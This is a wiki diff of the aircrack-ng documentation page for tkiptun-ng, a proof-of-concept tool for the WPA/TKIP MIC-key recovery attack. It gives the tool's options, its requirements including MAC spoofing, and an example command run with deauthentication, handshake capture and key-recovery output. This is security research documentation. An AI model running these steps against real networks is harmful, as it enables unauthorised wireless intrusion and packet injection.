User Tools

Site Tools


tkiptun-ng

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revision Previous revision
Next revision
Previous revision
tkiptun-ng [2008/11/09 21:11]
darkaudax First draft of the documentation
tkiptun-ng [2009/09/27 16:01] (current)
darkaudax Updated to reflect v1.0
Line 3: Line 3:
 ===== Description ===== ===== Description =====
  
-NOTE: This documention ​is still under development. ​ Please check back on a regular basis to obtain the latest updates. ​ If you have any feedback on the documentation,​ please post your comments to the [[http://​forum.tinyshell.be|Forum]].+NOTE: This documentation ​is still under development. ​ Please check back on a regular basis to obtain the latest updates. ​ If you have any feedback on the documentation,​ please post your comments to the [[http://​forum.aircrack-ng.org|Forum]].
  
-NOTE: The tkiptun-ng ​SVN version ​is not fully working.  ​working ​version will be released shortly.+**IMPORTANT ​NOTE:** The tkiptun-ng ​included in v1.0 is not fully working.  ​The final attack phase is not yet implemented. ​ The other portions are working ​with the ieee80211 drivers for RT73 and RTL8187L chipsets. ​ The madwifi-ng driver is definitely broken and is known to completely fail.  tkiptun-ng may work with other drivers but has not been tested so your mileage may vary.
  
 Tkiptun-ng is a tool created by Martin Beck aka hirte, a member of aircrack-ng team. This tool is able to inject a few frames into a WPA TKIP network with QoS.  He worked with Erik Tews (who created PTW attack) for a conference in [[http://​pacsec.jp/​|PacSec 2008]]: "Gone in 900 Seconds, Some Crypto Issues with WPA". Tkiptun-ng is a tool created by Martin Beck aka hirte, a member of aircrack-ng team. This tool is able to inject a few frames into a WPA TKIP network with QoS.  He worked with Erik Tews (who created PTW attack) for a conference in [[http://​pacsec.jp/​|PacSec 2008]]: "Gone in 900 Seconds, Some Crypto Issues with WPA".
  
-Tkiptun-ng is the proof-of-concept implementation the WPA/TKIP attack. ​ This attack is described in the paper, [[http://​dl.aircrack-ng.org/​breakingwepandwpa.pdf|Practical attacks against WEP and WPA]] written by Martin Beck and Erik Tews.  The paper describes advanced attacks on WEP and the first practical attack on WPA.  An additional excellent references explaining how tkiptun-ng does its magic is this ars technica article [[http://​arstechnica.com/​articles/paedia/​wpa-cracked.ars/​|Battered,​ but not broken: understanding the WPA crack]] by Glenn Fleishman.+Tkiptun-ng is the proof-of-concept implementation the WPA/TKIP attack. ​ This attack is described in the paper, [[http://​dl.aircrack-ng.org/​breakingwepandwpa.pdf|Practical attacks against WEP and WPA]] written by Martin Beck and Erik Tews.  The paper describes advanced attacks on WEP and the first practical attack on WPA.  An additional excellent references explaining how tkiptun-ng does its magic is this ars technica article [[http://​arstechnica.com/​security/news/​2008/​11/​wpa-cracked.ars/​|Battered,​ but not broken: understanding the WPA crack]] by Glenn Fleishman.
  
-Basically tkiptun-ng starts by obtaining the plaintext of a small packet and the MIC (Message Integrity Check). ​ This is done via [[chopchop]]-type method. ​ Once this is done, the MICHAEL algorithm is reversed the MIC key used to protect packets being sent from the AP to the client can be calculated.+Basically tkiptun-ng starts by obtaining the plaintext of a small packet and the MIC (Message Integrity Check). ​ This is done via [[chopchoptheory|chopchop]]-type method. ​ Once this is done, the MICHAEL algorithm is reversed the MIC key used to protect packets being sent from the AP to the client can be calculated.
  
 At this point, tkiptun-ng has recovered the MIC key  and knows a keystram for access point to client communication. ​ Subsequently,​ using the XOR file, you can create new packets and inject them.  The creation and injection are done using the other aircrack-ng suite tools. At this point, tkiptun-ng has recovered the MIC key  and knows a keystram for access point to client communication. ​ Subsequently,​ using the XOR file, you can create new packets and inject them.  The creation and injection are done using the other aircrack-ng suite tools.
  
-Please remember this is an extremely advanced attack. ​ You require ​advanced linux and aircrack-ng skills to use this tool.  DO NOT EXPECT support unless you can demonstrate you have these skills. ​ Novices will NOT BE SUPPORTED.+[[http://​download.aircrack-ng.org/​wiki-files/​doc/​tkip_master.pdf|Cryptanalysis of IEEE 802.11i TKIP]] by Finn Michael Halvorsen and Olav Haugen, June 2009 provides an excellent detailed description of how tkiptun-ng works. ​ As well, their paper includes detailed descriptions of many other attacks against WEP/​WPA/​WPA2. 
 + 
 +Please remember this is an extremely advanced attack. ​ You must possess ​advanced linux and aircrack-ng skills to use this tool.  DO NOT EXPECT support unless you can demonstrate you have these skills. ​ Novices will NOT BE SUPPORTED.
  
  
Line 24: Line 26:
 The AP must be configured for WPA plus TKIP. The AP must be configured for WPA plus TKIP.
  
-A fairly long rekeying time must be in use such as 3600 seconds. ​ It should be at  least 20 minutes.+A fairly long rekeying time must be in use such as 3600 seconds. ​ It should be at least 20 minutes.
  
  
 ===== Specific Requirements ===== ===== Specific Requirements =====
  
-The network card MAC address ​that is used by tkiptun-ng needs to be set to the MAC address of the client you are attacking.+The network card MAC address used by tkiptun-ng needs to be set to the MAC address of the client you are attacking. 
  
  
Line 36: Line 39:
 This section is very preliminary. ​ As tkiptun-ng works, it goes through various phases. ​ People ask "Why is such and such done?"​. ​ This section attempts to answer those questions. This section is very preliminary. ​ As tkiptun-ng works, it goes through various phases. ​ People ask "Why is such and such done?"​. ​ This section attempts to answer those questions.
  
-Question:+**Question:** \\
 Why is the handshake gathered? Why is the handshake gathered?
  
-Answer: +**Answer:** \\ 
-It is done for debugging reasons. ​ First, so  that the temporal keys in tkiptun can be calculated.  ​Seocnd, check them against the calculated values from the plaintext packet.+It is done for debugging reasons. ​ First, so  that the temporal keys in tkiptun can be calculated.  ​Second, check them against the calculated values from the plaintext packet.
  
 Another reason, is to check if the AP/client reuses the nonces after a mic shutdown. Another reason, is to check if the AP/client reuses the nonces after a mic shutdown.
Line 47: Line 50:
 ===== Usage ===== ===== Usage =====
  
-usage: tkiptun-ng <​options>​ <replay interface>​+Usage: tkiptun-ng <​options>​ <replay interface>​
  
 Filter options: Filter options:
Line 57: Line 60:
   * -t tods   : frame control, To      DS bit   * -t tods   : frame control, To      DS bit
   * -f fromds : frame control, From    DS bit   * -f fromds : frame control, From    DS bit
-   * -D        : disable AP detection+  ​* -D        : disable AP detection
  
 Replay options: Replay options:
Line 80: Line 83:
   * -i iface  : capture packets from this interface   * -i iface  : capture packets from this interface
   * -r file   : extract packets from this pcap file   * -r file   : extract packets from this pcap file
- +\\ 
---help ​             : Displays this usage screen+  *-''''​-help              : Displays this usage screen
  
  
Line 88: Line 91:
 The example below is incomplete but it gives some idea of how it looks. The example below is incomplete but it gives some idea of how it looks.
  
-Input: tkiptun-ng ​ -h 00:​0F:​B5:​AB:​CB:​9D -a 00:​14:​6C:​7E:​40:​80 -m 80 -n 100 ath0+Input: 
 + 
 +   tkiptun-ng -h 00:​0F:​B5:​AB:​CB:​9D -a 00:​14:​6C:​7E:​40:​80 -m 80 -n 100 rausb0 ​
  
 Output: Output:
  
-Blub 2:38 E6 38 1C 24 15 1C CF\\ +   The interface MAC (00:​0E:​2E:​C5:​81:​D3) doesn'​t match the specified MAC (-h). 
-Blub 1:17 DD 0D 69 1D C3 1F EE\\ +        ifconfig rausb0 hw ether 00:​0F:​B5:​AB:​CB:​9D 
-Blub 3:29 31 79 E7 E6 CF 8D 5E\\ +   Blub 2:38 E6 38 1C 24 15 1C CF  
-14:48:00  ​Michael Test: Successful\\ +   ​Blub 1:17 DD 0D 69 1D C3 1F EE  
-14:48:00  ​Waiting for beacon frame (BSSID: 00:​14:​6C:​7E:​40:​80) on channel 9\\ +   ​Blub 3:29 31 79 E7 E6 CF 8D 5E  
-14:48:00  Found specified AP\\ +   15:06:48  Michael Test: Successful 
-14:​48:​00 ​ Sending 4 directed DeAuth. STMAC: [00:​0F:​B5:​AB:​CB:​9D] [ 2ACKs]\\ +   15:06:48  Waiting for beacon frame (BSSID: 00:​14:​6C:​7E:​40:​80) on channel 9 
-14:48:02  WPA handshake: 00:​14:​6C:​7E:​40:​80 captured\\ +   15:06:48  Found specified AP 
-14:48:02  ​Waiting for an ARP packet coming from the Client...\\ +   15:06:48  ​Sending 4 directed DeAuth. STMAC[00:​0F:​B5:​AB:​CB:​9D] [ 0| 0 ACKs] 
-Saving chosen packet in replay_src-1109-144822.cap\\ +   ​15:​06:​54 ​ ​Sending 4 directed DeAuth. STMAC: [00:​0F:​B5:​AB:​CB:​9D] [ 0ACKs] 
-14:48:22  ​Waiting for an ARP response packet coming from the AP...\\ +   15:06:56  WPA handshake: 00:​14:​6C:​7E:​40:​80 captured 
-Saving chosen packet in replay_src-1109-144822.cap\\ +   15:06:56  ​Waiting for an ARP packet coming from the Client... 
-14:48:22  Got the answer!\\ +   ​Saving chosen packet in replay_src-0305-150705.cap 
-14:48:22  ​Waiting ​seconds to let encrypted EAPOL frames pass without interfering.\\ +   15:07:05  ​Waiting for an ARP response packet coming from the AP... 
- +   ​Saving chosen packet in replay_src-0305-150705.cap 
-Sent  40 packets, current guess: 27..\\+   15:07:05  Got the answer! 
 +   15:07:05  ​Waiting ​10 seconds to let encrypted EAPOL frames pass without interfering. 
 +   ​ 
 +   15:​07:​25 ​ Offset ​  99 ( 0% done) | xor = B3 | pt = D3 |  103 frames written in 84468ms 
 +   15:08:32  Offset ​  98 ( 1% done) | xor = AE | pt = 80 |   64 frames written in 52489ms 
 +   ​15:​09:​45 ​ Offset ​  97 ( 3% done) | xor = DE | pt = C8 |  131 frames written in 107407ms 
 +   ​15:​11:​05 ​ Offset ​  96 ( 5% done) | xor = 5A | pt = 7A |  191 frames written in 156619ms 
 +   ​15:​12:​07 ​ Offset ​  95 ( 6% done) | xor = 27 | pt = 02 |   21 frames written in 17221ms 
 +   ​15:​13:​11 ​ Offset ​  94 ( 8% done) | xor = D8 | pt = AB |   41 frames written in 33625ms 
 +   ​15:​14:​12 ​ Offset ​  93 (10% done) | xor = 94 | pt = 62 |   13 frames written in 10666ms 
 +   ​15:​15:​24 ​ Offset ​  92 (11% done) | xor = DF | pt = 68 |  112 frames written in 91829ms 
 +   Looks like mic failure report was not detectedWaiting 60 seconds before trying again to avoid the AP shutting down. 
 +   ​15:​18:​13 ​ Offset ​  91 (13% done) | xor = A1 | pt = E1 |  477 frames written in 391139ms 
 +   ​15:​19:​32 ​ Offset ​  90 (15% done) | xor = 5F | pt = B2 |  186 frames written in 152520ms 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   ​15:​22:​09 ​ Offset ​  89 (16% done) | xor = 9C | pt = 77 |  360 frames written in 295200ms 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   ​15:​26:​10 ​ Offset ​  88 (18% done) | xor = 0D | pt = 3E |  598 frames written in 490361ms 
 +   ​15:​27:​33 ​ Offset ​  87 (20% done) | xor = 8C | pt = 00 |  230 frames written in 188603ms 
 +   ​15:​28:​38 ​ Offset ​  86 (21% done) | xor = 67 | pt = 00 |   47 frames written in 38537ms 
 +   ​15:​29:​53 ​ Offset ​  85 (23% done) | xor = AD | pt = 00 |  146 frames written in 119720ms 
 +   ​15:​31:​16 ​ Offset ​  84 (25% done) | xor = A3 | pt = 00 |  220 frames written in 180401ms 
 +   ​15:​32:​23 ​ Offset ​  83 (26% done) | xor = 28 | pt = 00 |   75 frames written in 61499ms 
 +   ​15:​33:​38 ​ Offset ​  82 (28% done) | xor = 7C | pt = 00 |  141 frames written in 115619ms 
 +   ​15:​34:​40 ​ Offset ​  81 (30% done) | xor = 02 | pt = 00 |   19 frames written in 15584ms 
 +   ​15:​35:​57 ​ Offset ​  80 (31% done) | xor = C9 | pt = 00 |  171 frames written in 140221ms 
 +   ​15:​37:​13 ​ Offset ​  79 (33% done) | xor = 38 | pt = 00 |  148 frames written in 121364ms 
 +   ​15:​38:​21 ​ Offset ​  78 (35% done) | xor = 71 | pt = 00 |   84 frames written in 68872ms 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   ​15:​40:​55 ​ Offset ​  77 (36% done) | xor = 8E | pt = 00 |  328 frames written in 268974ms 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   ​15:​43:​31 ​ Offset ​  76 (38% done) | xor = 38 | pt = 00 |  355 frames written in 291086ms 
 +   ​15:​44:​37 ​ Offset ​  75 (40% done) | xor = 79 | pt = 00 |   61 frames written in 50021ms 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   ​15:​47:​05 ​ Offset ​  74 (41% done) | xor = 59 | pt = 00 |  269 frames written in 220581ms 
 +   ​15:​48:​30 ​ Offset ​  73 (43% done) | xor = 14 | pt = 00 |  249 frames written in 204178ms 
 +   ​15:​49:​49 ​ Offset ​  72 (45% done) | xor = 9A | pt = 00 |  183 frames written in 150059ms 
 +   Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down. 
 +   ​15:​52:​32 ​ Offset ​  71 (46% done) | xor = 03 | pt = 00 |  420 frames written in 344400ms 
 +   ​15:​53:​57 ​ Offset ​  70 (48% done) | xor = 0E | pt = 00 |  239 frames written in 195980ms 
 +   ​Sleeping for 60 seconds.36 bytes still unknown 
 +   ARP Reply 
 +   ​Checking 192.168.x.y 
 +   ​15:​54:​11 ​ Reversed MIC Key (FromDS): C3:​95:​10:​04:​8F:​8D:​6C:​66 
 +    
 +   ​Saving plaintext in replay_dec-0305-155411.cap 
 +   ​Saving keystream in replay_dec-0305-155411.xor 
 +   ​15:​54:​11 ​  
 +   ​Completed in 2816s (0.02 bytes/s) 
 +    
 +   ​15:​54:​11 ​ AP MAC: 00:​40:​F4:​77:​F0:​9B IP: 192.168.21.42 
 +   ​15:​54:​11 ​ Client MAC: 00:​0F:​B5:​AB:​CB:​9D IP: 192.168.21.112 
 +   ​15:​54:​11 ​ Sent encrypted tkip ARP request to the client. 
 +   ​15:​54:​11 ​ Wait for the mic countermeasure timeout of 60 seconds.
  
  
tkiptun-ng.1226261493.txt.gz · Last modified: 2008/11/09 21:11 by darkaudax